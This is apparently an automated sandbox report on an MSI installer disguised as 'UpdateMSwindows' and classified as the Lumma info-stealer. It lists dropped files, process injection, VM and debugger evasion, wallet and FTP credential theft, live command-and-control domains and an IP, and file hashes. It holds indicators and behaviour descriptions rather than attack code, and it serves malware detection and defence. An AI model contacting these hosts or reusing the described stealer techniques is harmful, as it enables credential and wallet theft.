              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481471 Sample: NB4EASbynx.msi Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 62 warrantelespsz.shop 2->62 64 fDwYocEDWIyxswuSuKqfrffGAPh.fDwYocEDWIyxswuSuKqfrffGAPh 2->64 70 Found malware configuration 2->70 72 Antivirus detection for URL or domain 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 4 other signatures 2->76 11 msiexec.exe 13 2->11         started        14 msiexec.exe 79 32 2->14         started        signatures3 process4 file5 46 C:\Users\user\AppData\Local\...\MSI53B9.tmp, PE32 11->46 dropped 48 C:\Users\user\AppData\Local\...\MSIC706.tmp, PE32 11->48 dropped 50 C:\Users\user\AppData\Local\...\MSI537A.tmp, PE32 11->50 dropped 58 5 other files (none is malicious) 11->58 dropped 16 MSI53B9.tmp 6 11->16         started        52 C:\Windows\Installer\MSIEAB6.tmp, PE32 14->52 dropped 54 C:\Windows\Installer\MSIEA95.tmp, PE32 14->54 dropped 56 C:\Windows\Installer\MSIEA27.tmp, PE32 14->56 dropped 20 msiexec.exe 14->20         started        22 msiexec.exe 14->22         started        process6 file7 44 C:\Users\user\Desktop\SymposiumTaiwan.exe, PE32 16->44 dropped 68 Drops large PE files 16->68 24 SymposiumTaiwan.exe 41 16->24         started        signatures8 process9 signatures10 78 Found stalling execution ending in API Sleep call 24->78 27 cmd.exe 3 24->27         started        process11 file12 60 C:\Users\user\AppData\Local\...\Dicks.pif, PE32 27->60 dropped 88 Drops PE files with a suspicious file extension 27->88 31 Dicks.pif 27->31         started        34 cmd.exe 2 27->34         started        36 conhost.exe 27->36         started        38 7 other processes 27->38 signatures13 process14 signatures15 90 Found API chain indicative of debugger detection 31->90 92 Injects a PE file into a foreign processes 31->92 94 LummaC encrypted strings found 31->94 40 Dicks.pif 2 31->40         started        process16 dnsIp17 66 warrantelespsz.shop 188.114.96.3, 443, 49722, 49723 CLOUDFLARENETUS European Union 40->66 80 Query firmware table information (likely to detect VMs) 40->80 82 Found many strings related to Crypto-Wallets (likely being stolen) 40->82 84 Tries to harvest and steal ftp login credentials 40->84 86 2 other signatures 40->86 signatures18

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              NB4EASbynx.msi18%ReversingLabsWin32.Spyware.Lummastealer
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\558563\Dicks.pif7%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI4F6E.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI5124.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI523E.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI527E.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI52AE.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI537A.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI53B9.tmp8%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSIC706.tmp0%ReversingLabs
              C:\Windows\Installer\MSIEA27.tmp0%ReversingLabs
              C:\Windows\Installer\MSIEA95.tmp0%ReversingLabs
              C:\Windows\Installer\MSIEAB6.tmp0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://warrantelespsz.shop/0%Avira URL Cloudsafe
              https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
              https://warrantelespsz.shop:443/api100%Avira URL Cloudmalware
              https://warrantelespsz.shop/apiOR0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              lariatedzugspd.shop0%Avira URL Cloudsafe
              https://warrantelespsz.shop:443/apiMicrosoft0%Avira URL Cloudsafe
              https://warrantelespsz.shop/N0%Avira URL Cloudsafe
              https://warrantelespsz.shop:443/api0-0%Avira URL Cloudsafe
              https://warrantelespsz.shop/fe0%Avira URL Cloudsafe
              https://warrantelespsz.shop/api7N/0%Avira URL Cloudsafe
              callosallsaospz.shop0%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              https://warrantelespsz.shop/apiBNz0%Avira URL Cloudsafe
              https://www.mozilla.or0%Avira URL Cloudsafe
              https://warrantelespsz.shop/api100%Avira URL Cloudmalware
              https://warrantelespsz.sho80%Avira URL Cloudsafe
              http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
              liernessfornicsa.shop0%Avira URL Cloudsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.0%Avira URL Cloudsafe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
              https://warrantelespsz.shop/pim0%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              shepherdlyopzc.shop0%Avira URL Cloudsafe
              https://warrantelespsz.shop/pid0%Avira URL Cloudsafe
              https://warrantelespsz.shop/ob0%Avira URL Cloudsafe
              warrantelespsz.shop0%Avira URL Cloudsafe
              upknittsoappz.shop0%Avira URL Cloudsafe
              outpointsozp.shop0%Avira URL Cloudsafe
              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b30%Avira URL Cloudsafe
              https://warrantelespsz.shop/ta0%Avira URL Cloudsafe
              https://warrantelespsz.shop/pi0%Avira URL Cloudsafe
              unseaffarignsk.shop0%Avira URL Cloudsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              warrantelespsz.shop
              188.114.96.3
              truetrue
                unknown
                fDwYocEDWIyxswuSuKqfrffGAPh.fDwYocEDWIyxswuSuKqfrffGAPh
                unknown
                unknownfalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  lariatedzugspd.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  callosallsaospz.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  liernessfornicsa.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://warrantelespsz.shop/apifalse
                  • Avira URL Cloud: malware
                  unknown
                  shepherdlyopzc.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  warrantelespsz.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  upknittsoappz.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  outpointsozp.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  unseaffarignsk.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabDicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://warrantelespsz.shop:443/apiDicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://duckduckgo.com/ac/?q=Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://warrantelespsz.shop:443/api0-Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://warrantelespsz.shop/Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://warrantelespsz.shop/apiORDicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://warrantelespsz.shop/NDicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://warrantelespsz.shop:443/apiMicrosoftDicks.pif, 00000017.00000003.3182124941.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.autoitscript.com/autoit3/Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgDicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://warrantelespsz.sho8Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://warrantelespsz.shop/feDicks.pif, 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://x1.c.lencr.org/0Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://x1.i.lencr.org/0Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://warrantelespsz.shop/api7N/Dicks.pif, 00000017.00000003.3234780524.0000000001173000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://support.mozilla.org/products/firefoxgro.allDicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.mozilla.orDicks.pif, 00000017.00000003.3181573889.000000000343C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://warrantelespsz.shop/apiBNzDicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266103716.0000000001173000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.autoitscript.com/autoit3/JDicks.pif, 00000013.00000000.2532080897.00000000000F9000.00000002.00000001.01000000.0000000A.sdmp, Dicks.pif, 00000017.00000002.3265460967.00000000000F9000.00000002.00000001.01000000.0000000A.sdmp, Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Notify.8.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoDicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiDicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://warrantelespsz.shop/obDicks.pif, 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://warrantelespsz.shop/pimDicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.rootca1.amazontrust.com/rootca1.crl0Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://warrantelespsz.shop/pidDicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266151396.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.rootca1.amazontrust.com0:Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nsis.sf.net/NSIS_ErrorErrorSymposiumTaiwan.exe, 00000008.00000000.2491029205.0000000000409000.00000002.00000001.01000000.00000009.sdmp, SymposiumTaiwan.exe, 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmp, SymposiumTaiwan.exe.4.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.ecosia.org/newtab/Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brDicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://ac.ecosia.org/autocomplete?q=Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://warrantelespsz.shop/piDicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266151396.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3234579909.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgDicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crt.rootca1.amazontrust.com/rootca1.cer0?Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://warrantelespsz.shop/taDicks.pif, 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaDicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  188.114.96.3
                  warrantelespsz.shopEuropean Union
                  13335CLOUDFLARENETUStrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1481471
                  Start date and time:2024-07-25 09:51:32 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 33s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:24
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:NB4EASbynx.msi
                  renamed because original name is a hash value
                  Original Sample Name:3b48c90d4a283982ced898df9570894b.msi
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winMSI@33/67@2/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 182
                  • Number of non-executed functions: 222
                  Cookbook Comments:
                  • Found application associated with file extension: .msi
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: NB4EASbynx.msi
                  TimeTypeDescription
                  03:53:00API Interceptor1x Sleep call for process: SymposiumTaiwan.exe modified
                  03:53:42API Interceptor35x Sleep call for process: Dicks.pif modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  188.114.96.3LisectAVT_2403002B_352.exeGet hashmaliciousUnknownBrowse
                  • avkit.org/home/getconverter/?id=4
                  LisectAVT_2403002B_352.exeGet hashmaliciousUnknownBrowse
                  • avkit.org/home/getconverter/?id=4
                  https://www.trypineappledigital.agency/Get hashmaliciousUnknownBrowse
                  • daytimeadmirable.icu/favicon.ico
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/jk8Z5I
                  DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/cyd
                  S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                  • wx.ax/Xm6
                  http://comicextra.me/favicon.icoGet hashmaliciousUnknownBrowse
                  • comicextra.org/favicon.ico
                  AED 47,000.exeGet hashmaliciousFormBookBrowse
                  • www.yi992.com/iuti/
                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                  • filetransfer.io/data-package/eadkqsUM/download
                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                  • filetransfer.io/data-package/4jaIXkvS/download
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  warrantelespsz.shopwxNXR3EdaH.msiGet hashmaliciousLummaCBrowse
                  • 188.114.97.3
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSConfirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.97.3
                  Scan file.docGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  LisectAVT_2403002C_15.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.13.205
                  LisectAVT_2403002C_16.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.12.205
                  nX1oQE2we8.exeGet hashmaliciousCryptOne, QbotBrowse
                  • 104.21.34.74
                  LisectAVT_2403002C_18.exeGet hashmaliciousRaccoonBrowse
                  • 188.114.96.3
                  gbl.exeGet hashmaliciousUnknownBrowse
                  • 104.26.4.75
                  LisectAVT_2403002C_18.exeGet hashmaliciousRaccoonBrowse
                  • 188.114.97.3
                  gbl.exeGet hashmaliciousUnknownBrowse
                  • 172.67.68.40
                  https://forms.office.com/Pages/ResponsePage.aspx?id=kAi_W0yZC0qQpKIHxTYoPxauHzsZJkZMuCk5U9e1Y4RUNFlCMDNQTTdIRTdLV0dKQ1lOUjJYQjg4Si4u&origin=Invitation&channel=0Get hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  a0e9f5d64349fb13191bc781f81f42e1Payroll for July.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 188.114.96.3
                  2nd_Quarter_Order_Sheet_xls_0000000000000000000.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 188.114.96.3
                  CWS610973I4SC2024.exeGet hashmaliciousDBatLoaderBrowse
                  • 188.114.96.3
                  Import_Tax Invoice_PL_xls_0000000000000000000 .exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 188.114.96.3
                  Quotation .exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 188.114.96.3
                  Request Quotation.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 188.114.96.3
                  MT103 BANK ERROR.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 188.114.96.3
                  Purchase Order 108099.exeGet hashmaliciousDBatLoaderBrowse
                  • 188.114.96.3
                  CWS610973I4SC2024.exeGet hashmaliciousDBatLoaderBrowse
                  • 188.114.96.3
                  3AcGdb5sdS.exeGet hashmaliciousCobaltStrikeBrowse
                  • 188.114.96.3
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\558563\Dicks.pifLisectAVT_2403002A_117.exeGet hashmaliciousRedLineBrowse
                    wxNXR3EdaH.msiGet hashmaliciousLummaCBrowse
                      main.exeGet hashmaliciousUnknownBrowse
                        main.exeGet hashmaliciousUnknownBrowse
                          main.exeGet hashmaliciousUnknownBrowse
                            main.exeGet hashmaliciousUnknownBrowse
                              main.exeGet hashmaliciousUnknownBrowse
                                lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                  giupload.exeGet hashmaliciousLummaCBrowse
                                    SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exeGet hashmaliciousUnknownBrowse
                                      C:\Users\user\AppData\Local\Temp\MSI4F6E.tmpwxNXR3EdaH.msiGet hashmaliciousLummaCBrowse
                                        6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                          Estimado_1546359641.155196.msiGet hashmaliciousVMdetectBrowse
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):7799
                                            Entropy (8bit):5.557195037801374
                                            Encrypted:false
                                            SSDEEP:96:w5R4DKnw+evyRzGGTUNHxTCsThqAqTUNHxTC6jVDtFThqAMHGY5OjWxARKZCMplR:w3tbeqMGADOIMADOysELMpD
                                            MD5:B4A5B98ABF68B4A44B2D8854B7917E15
                                            SHA1:B0437CB2E3186F8042E9F4B5050539EF411FB4E6
                                            SHA-256:1FF32236A3FA8EFB128FAA4D5BA7AD60CCEF4552F9DDC4D85741678A9CB56DAB
                                            SHA-512:959678508E0B1B873B43FE79BBDEB5A571A3A9D8B88740CFEF34E52403EB3FFE5C0FD806BA6C276503627248D4C00D11AB23459C8C43D8E34DA506AA8A76B390
                                            Malicious:false
                                            Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{F7154933-FAB7-4F13-A08C-0291DB5E5D05}..UpdateMSwindows..NB4EASbynx.msi.@.....@.....@.....@........&.{94DF14AB-36C1-4886-A54A-687987508C4D}.....@.....@.....@.....@.......@.....@.....@.......@......UpdateMSwindows......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{EF0CC9F4-2421-4C1C-B08A-029700B2B11C}&.{F7154933-FAB7-4F13-A08C-0291DB5E5D05}.@......&.{E7DD4B25-BE79-4B50-9770-B4FE0693249A}&.{F7154933-FAB7-4F13-A08C-0291DB5E5D05}.@........CreateFolders..Creating folders..Folder: [1]#.7.C:\Program Files (x86)\UpdateMSwindows\UpdateMSwindows\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....(.Software\UpdateMSwindows\UpdateMSwindows...@....(.&...Version..1.0.0'.&...Path7.C:\Program Files (x86)\UpdateMSwindows\UpdateMSwindows\....RegisterProduct..Registering product......C:\Windows\Instal
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:modified
                                            Size (bytes):893608
                                            Entropy (8bit):6.620254876639106
                                            Encrypted:false
                                            SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                            MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                            SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                            SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                            SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 7%
                                            Joe Sandbox View:
                                            • Filename: LisectAVT_2403002A_117.exe, Detection: malicious, Browse
                                            • Filename: wxNXR3EdaH.msi, Detection: malicious, Browse
                                            • Filename: main.exe, Detection: malicious, Browse
                                            • Filename: main.exe, Detection: malicious, Browse
                                            • Filename: main.exe, Detection: malicious, Browse
